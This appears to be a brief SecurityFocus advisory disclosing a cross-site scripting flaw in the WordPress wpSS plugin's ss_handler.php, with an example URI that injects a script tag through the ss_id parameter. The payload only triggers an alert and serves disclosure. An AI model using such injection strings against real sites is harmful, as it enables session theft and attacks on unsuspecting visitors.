WordPress wpSS Plugin 'ss_handler.php' Cross Site Scripting Vulnerability

An attacker can exploit the issue by enticing an unsuspecting user to visit a specially crafted URL.

The following example URI is available:

http://www.example.com/wordpress/wp-content/plugins/wpSS/ss_handler.php?ss_id="/><script>alert(1);</script>


 

Privacy Statement
Copyright 2010, SecurityFocus